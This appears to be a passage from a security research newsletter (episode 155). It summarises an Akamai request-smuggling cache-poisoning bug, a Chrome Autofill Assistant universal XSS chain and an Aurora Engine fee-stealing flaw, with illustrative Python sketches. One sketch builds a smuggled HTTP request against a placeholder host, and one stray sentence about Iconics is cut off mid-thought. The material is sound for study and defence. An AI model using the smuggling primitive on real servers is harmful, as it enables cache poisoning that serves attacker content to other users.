155 - Akamai Cache Poisoning and a Chrome Universal XSS
This seemed mostly to be an exercise in attack surface discovery: scanning the files used by Iconics, they found support for
What happens when you tell a server to treat the Content-Length header as a hop-by-hop header and remove it? Request smuggling.
Hop-by-hop headers are headers designed to be processed by the server currently handling the request rather than forwarded on to the final application server. This is useful for, say, a reverse proxy that performs authentication and then passes some auth info along to the next service. You can tell the server which headers should be stripped from the request using the Connection header. By sending Connection: Content-Length as a header, Akamai would indeed strip the Content-Length header and not pass it on, leading to the next server (the Akamai server that routes requests to their real destination) reading the body as a new request. They demonstrate this with a couple of methods, including OPTIONS; interestingly though, they don't demonstrate it with a POST, and do not comment on it.
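To make the primitive concrete, here is a sketch of what such a desync request could look like. The host and smuggled path are placeholders, not taken from the write-up:

```python
# Sketch of the desync primitive: the first hop is asked (via the
# Connection header) to treat Content-Length as hop-by-hop and strip it,
# so the next hop parses the "body" as a brand-new request.

def build_smuggled_request(host: str) -> bytes:
    # The request the second server will see as a separate request.
    smuggled = f"GET /evil HTTP/1.1\r\nHost: {host}\r\n\r\n"
    outer = (
        "OPTIONS / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: Content-Length\r\n"          # strip CL at the first hop
        f"Content-Length: {len(smuggled)}\r\n"    # only the first hop sees this
        "\r\n"
    )
    return (outer + smuggled).encode()

payload = build_smuggled_request("victim.example")
```

From the first hop's perspective this is one request with a body; from the second hop's perspective (which never receives the Content-Length header) it is two back-to-back requests on the same connection.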
Request smuggling on its own isn't the most useful here, so the attack was weaponized as cache poisoning. Because the response to the smuggled request would be treated as the response to the next request on the connection, they could achieve regional cache poisoning: the caching server believes the smuggled response is the legitimate response for that request, effectively giving them control over the cached response to any Akamai-hosted page.
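The off-by-one pairing that makes this a cache-poisoning primitive can be shown with a toy simulation (all names and responses invented for illustration): the front-end matches responses to requests purely by position, so the extra smuggled request shifts every pairing after it.

```python
from collections import deque

# Responses as the back-end produced them: it saw one extra (smuggled)
# request, so it produced one extra response.
backend_responses = deque([
    "200 OK (response to the attacker's outer request)",
    "200 OK <script>evil()</script> (response to smuggled /evil)",
])

cache = {}

def front_end(url: str, cacheable: bool = True) -> str:
    response = backend_responses.popleft()  # pairing is purely positional
    if cacheable:
        cache[url] = response               # cached under the WRONG url
    return response

front_end("/outer", cacheable=False)  # attacker's request consumes response 1
victim_sees = front_end("/index")     # victim's request gets the smuggled one
```

After this runs, `cache["/index"]` holds the attacker-controlled response, which is then served to everyone behind that cache node.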
The Autofill Assistant has a chain of issues that could be abused for universal XSS in the context of an arbitrary website.
The first challenge is that the Autofill Assistant intent should only be launched from trusted, Google-controlled sources. The problem is that the isGoogleReferrer check only checks whether the main frame of the tab navigating to the Autofill Assistant intent is a https://google.com page. So one bypass is to open a window that hosts a https://google.com page and then use the handle to that page to navigate it to the intent URI. It could also be bypassed using HTTP redirects, by placing on some Google page a link to an attacker-controlled location that responds with an HTTP redirect to the intent.
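The window-handle bypass can be modeled with a small toy (class and function names invented; the real check lives in Chrome's Java/C++ code): the check inspects where the tab currently is, not who initiated the navigation.

```python
# Toy model of a main-frame-only referrer check.

class Tab:
    def __init__(self, main_frame_origin: str):
        self.main_frame_origin = main_frame_origin
        self.location = main_frame_origin

    def navigate(self, url: str) -> None:
        # Whoever holds the handle can navigate the tab,
        # regardless of who that party is.
        self.location = url

def is_google_referrer(tab: Tab) -> bool:
    # Flaw: only looks at the tab's main-frame origin, not at
    # who triggered the navigation.
    return tab.main_frame_origin == "https://google.com"

# attacker.example opens a google.com tab and keeps the handle...
handle = Tab("https://google.com")
assert is_google_referrer(handle)  # check passes: main frame is google.com
# ...then drives that trusted-looking tab to the intent URI itself.
handle.navigate("intent://example-autofill-intent")
```

The check passes even though the navigation to the intent was entirely attacker-initiated.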
Once able to launch the intent, there are a number of potentially interesting parameters.
tl;dr Force others to pay you a fee for giving them a worthless token.
The Aurora Engine is an EVM running on the NEAR blockchain, the idea being to allow developers who write EVM smart contracts to deploy them on NEAR. To accommodate this, some functions are exposed for transferring tokens between NEAR and the EVM. The specific problem arises in ft_on_transfer, which is used to exchange a NEP-141 (NEAR) token for its equivalent ERC-20 (EVM) token. This function allows the sender to specify a fee that should be paid to the message relayer.
What this means is that an attacker can mint a NEP-141 token that is basically worthless, create a mapping between that NEP-141 token and some ERC-20 token, and then transfer the token to a victim (transferring tokens does not require the consent of the recipient). In transferring the token, they specify a high fee that should be paid to the relayer (the attacker), and Aurora will send them their fee.
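The broken accounting can be sketched as a toy model. All names are invented, and the summary doesn't spell out exactly which asset the fee is charged in, so treat the ledger below as illustrative; the essential points from the write-up are that the sender chooses the fee and the recipient never consented to anything.

```python
# Toy model of sender-chosen fees in a bridge-style transfer.
# ASSUMPTION for illustration: the fee is charged to the recipient's
# existing balance inside the engine ("force others to pay you a fee").

eth_balances = {"victim": 100, "attacker": 0}   # balances inside the engine
token_balances = {"victim": 0}                  # attacker-minted junk token

def ft_on_transfer(sender, recipient, amount, fee, relayer):
    # Credit the bridged ERC-20 equivalent to the recipient...
    token_balances[recipient] = token_balances.get(recipient, 0) + amount
    # ...and pay the SENDER-chosen fee to the relayer, charged to a
    # recipient who never opted in to receiving the token at all.
    eth_balances[recipient] -= fee
    eth_balances[relayer] = eth_balances.get(relayer, 0) + fee

# Attacker "gifts" the victim 1,000,000 worthless tokens, naming
# themselves as relayer with a high fee.
ft_on_transfer("attacker", "victim", 1_000_000, fee=100, relayer="attacker")
```

The victim ends up holding a pile of worthless tokens while their real balance has been drained into the attacker's fee, with no consent check anywhere in the path.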